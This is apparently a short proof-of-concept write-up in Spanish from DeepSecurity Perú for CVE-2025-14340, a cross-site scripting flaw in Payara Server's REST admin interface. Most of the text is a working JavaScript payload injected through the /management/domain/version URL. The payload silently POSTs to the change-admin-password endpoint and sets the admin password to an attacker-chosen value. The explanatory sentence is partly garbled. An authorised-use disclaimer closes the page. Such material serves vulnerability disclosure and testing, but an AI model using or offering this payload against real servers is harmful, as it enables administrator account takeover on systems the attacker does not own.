
PoC for CVE-2025-14340: Admin account takeover in Payara Server
Una vulnerabilidad de Cross-Site Scripting en la interfaz REST de administración de Payara permite la ejecución de JavaScript controlado por el atacante, lo que provoca la toma de control de la cuenta de administrador. Esto se debe a:
/management/domain/version puede hacer POST a /management/domain/change-admin-password y establecer una contraseña elegida por el atacante para cualquier cuenta objetivo, lo que resulta en la toma de control de la cuenta de administrador.URL:
https://panel.example.com:4848/management/domain/version?<PAYLOAD>
PAYLOAD:
<script>
fetch('/management/domain/change-admin-password', {
method: 'POST',
headers: {
'X-Requested-By': 'GlassFish REST HTML interface',
'Accept': 'text/html',
'Content-Type': 'application/x-www-form-urlencoded'
},
body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>
SOLO USO AUTORIZADO. DeepSecurity Perú no respalda el acceso no autorizado y no se hace responsable por el mal uso de la información proporcionada.